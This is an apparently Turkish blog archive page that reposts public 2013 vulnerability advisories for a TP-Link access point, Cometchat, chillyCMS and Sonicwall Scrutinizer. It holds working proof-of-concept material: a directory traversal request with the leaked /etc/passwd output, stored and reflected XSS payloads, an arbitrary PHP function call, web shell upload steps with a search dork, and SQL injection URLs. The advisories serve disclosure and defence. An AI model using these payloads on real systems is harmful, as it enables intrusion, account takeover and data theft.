Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Python Exploit Read more
Archive for 15 Şubat 2013
Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Exploit
Category: Genel | Tags: Photodex ProShow Producer v5.0.3297 Local Exploit
TP-Link TL-WA701N / TL-WA701ND – Multiple Vulnerabilities
TP-Link TL-WA701N / TL-WA701ND – Roter'lerde açıklar bulunmuş olup, açık sayesinde /etc/passwd okunabilmekte XSS açığı oluşmaktadır.
Device Name: TL-WA701N / TL-WA701ND
Vendor: TP-Link
============ Vulnerable Firmware Releases: ============
Firmware Version: 3.12.6 Build 110210 Rel.37112n
Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012
Hardware Version: WA701N v1 00000000
Model No.: TL-WA701N / TL-WA701ND
Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1
============ Vulnerability Overview: ============
* Directory Traversal:
Access local files of the device. For example you could read /etc/passwd and /etc/shadow.
Request:
GET /help/../../etc/passwd HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.2/help/
==> > no authentication needed!!!
Response:
HTTP/1.1 200 OK
Server: TP-LINK Router
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
Content-Type: text/html
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD> <TITLE> TL-WA701N </TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"> <!--
if(window.parent == window){window.location.href="http://192.168.178.2";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--> </SCRIPT>
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png
This traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse
* The request for changing the password is a HTTP GET and the username and password are parameters of this HTTP GET:
http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save
* Stored XSS:
Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
-> Wireless MAC Filtering -> Add or Modify -> put your XSS in the description (parameter Desc)
Example Request:
http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc="><img src="0" onerror=alert(1)> &Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save
This XSS vulnerability was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/
* Stored XSS:
-> System Tools -> SNMP:
Injecting scripts into the parameter sys_name and sys_location reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name= </script> &sys_location= <script> alert('XSSed') </script> &get_community=111&get_source=123&set_community=123&set_source=111&Save=Save
============ Solution ============
No known solution available.
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-011
Twitter:
The traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse
The stored XSS vulnerability in the Desc parameter was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/
============ Time Line: ============
August 2012 - discovered vulnerability
06.08.2012 - reported vulnerability to TP-Link
14.02.2013 - public release
===================== Advisory end =====================
Category: Genel | Tags: TP-Link TL-WA701N / TL-WA701ND XSS Açığı
Cometchat Multiple Vulnerabilities
Cometchat chatroom.php scriptinde XSS açığı bulunmuş olup açık hakkında açıklamalar ve açığın kullanımı şu şekilde;
##################################################################################
__ _ _ ____
/ /___ _____ (_)_____________ ______(_)__ _____ / __ _________ _
__ / / __ `/ __ / / ___/ ___/ __ `/ ___/ / _ / ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ /
____/__,_/_/ /_/_/____/____/__,_/_/ /_/___/____(_)____/_/ __, /
/____/
##################################################################################
Cometchat chat Application All Version Multiple Vulnerabilities
Cometchat is a chat application which in use Vbulletin,Xenforo,SMF,MyBB and other integrated scripts
App Homepage : http://www.cometchat.com
Author(Pentester): B127Y
Special Thanks : Burtay and All Janissaries Team(Burtay,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
Jani Exploit id 1 (http://www.janissaries.org/exploits/1)
##################################################################################
1.)Code Execution P0C (modules/chatrooms/chatrooms.php)
call_user_func call_user_func($_GET['action']);
Can use all php functions and cometchat function without arguments
Live Demo:http://server/cometchat/modules/chatrooms/chatrooms.php?action=phpinfo
2.)XSS P0C (plugins/handwrite/index.php)
echo echo < < <EOD <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title> Download </title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <style> html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td { margin: 0; padding: 0; border: 0; outline: 0; font-weight: inherit; font-style: inherit; font-size: 100%; font-family: inherit; vertical-align: baseline; text-align: center; } html { height: 100%; overflow: hidden; /* Hides scrollbar in IE */ } body { height: 100%; margin: 0; padding: 0; } #flashcontent { height: 100%; } </style> </style> </head> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="100%" height="100%" align="middle" id="main"> <param name="allowScriptAccess" value="sameDomain" /> <param name="movie" value="handwriting.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="FlashVars" value="tid={$toId}" /> <param name="scale" value="exactFit" /> <embed src="handwriting.swf" width="100%" height="100%" autostart="false" quality="high" bgcolor="#ffffff" FlashVars="tid={$toId}" name="main" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /> </object> </body> </html> EOD;
$toId = $_GET['id'];
Live Demo:http://server/cometchat/plugins/handwrite/index.php?id="> <script> alert(document.cookie) </script>
Category: Genel | Tags: Cometchat XSS Açığı
chillyCMS 1.3.0 – Multiple Vulnerabilities
chillyCMS 1.3.0 Versiyonunda zip uzantılı dosya php uzantıya çevrilmek suretiyle shell upload açığı oluşmuş olup, açık hakkında açıklamalar şu şekilde;
# Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities
# Google Dork: "powered by chillyCMS"
# Date: 15 February 2013
# Exploit Author: Abhi M Balakrishnan
# Vendor Homepage: http://chillycms.bplaced.net/
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3.0
# Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8
# Video: ?v=6B3rND9S75g
# Vulnerability
Failure to Restrict URL Access
chillyCMS uses 302 redirects to restrict access to the unautorized pages.
# Exploit
Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/chillyCMS/
Step 2: Access http://localhost/chillyCMS/admin/
# Vulnerability
Arbitrary File Upload
chillyCMS/admin/design.site.php page extracts all uploaded ZIP files to chillyCMS/tmp directory
# Exploit
Step 1: Create a ZIP file of the files to be uploaded. Example: Compress shell.php to get shell.zip
Step 2: Upload shell.zip
Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php
# History
11 March 2012 - Discovered vulnerability and exploit, contacted the vendor.
12 March 2012 - Vendor responds back, exchanges few mails.
15 November 2012 - Vendor discontinues further development.
15 February 2013 - Published the vulnerabilities and exploits to the public.
# How to reproduce
The latest download from the website was not working on fresh install. An earlier version (1.1.3) has been installed and all the PHP files, except config.php, have been replaced with new files.
Category: Genel | Tags: chillyCMS 1.3.0 shell Upload Açığı
Sonicwall Scrutinizer v9.5.2 – SQL Injection Vulnerability
Sonicwall Scrutinizer v9.5.2 – SQL Injection Açığı bulunmuş Olup Açığın oluşum yeri ve Açık hakkındaki açıklamalar aşağıdaki gibidir;
Title:
======
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability
Date:
=====
2013-02-13
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=789
#9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL injection
#10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped
VL-ID:
=====
789
Common Vulnerability Scoring System:
====================================
7.3
Introduction:
=============
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool
to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers.
Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight
into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range
of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can
deploy Scrutinizer as a virtual appliance for high performance environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application.
Report-Timeline:
================
2012-12-05: Researcher Notification & Coordination
2012-12-07: Vendor Notification
2013-01-08: Vendor Response/Feedback
2013-02-10: Vendor Fix/Patch
2013-02-11: Public Disclosure
Status:
========
Published
Affected Products:
==================
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application.
The bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms.
The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or
gadget parameters. Exploitation requires no user interaction & without privileged application user account. Successful exploitation of
the remote sql vulnerability results in dbms & application compromise.
Vulnerable File(s):
[+] fa_web.cgi
Vulnerable Module(s):
[+] gadget listing
Vulnerable Parameter(s):
[+] orderby
[+] gadget
Proof of Concept:
=================
The remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account
and also without user interaction. For demonstration or reproduce ...
PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27
Solution:
=========
1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query
2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection
Risk:
=====
The security risk of the remote sql injection vulnerability is estimated as high(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ()
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: - -
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: - -
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ( or ) to get a permission.
Copyright � 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT:
Category: Genel | Tags: Sonicwall Scrutinizer v9.5.2 SQL Açığı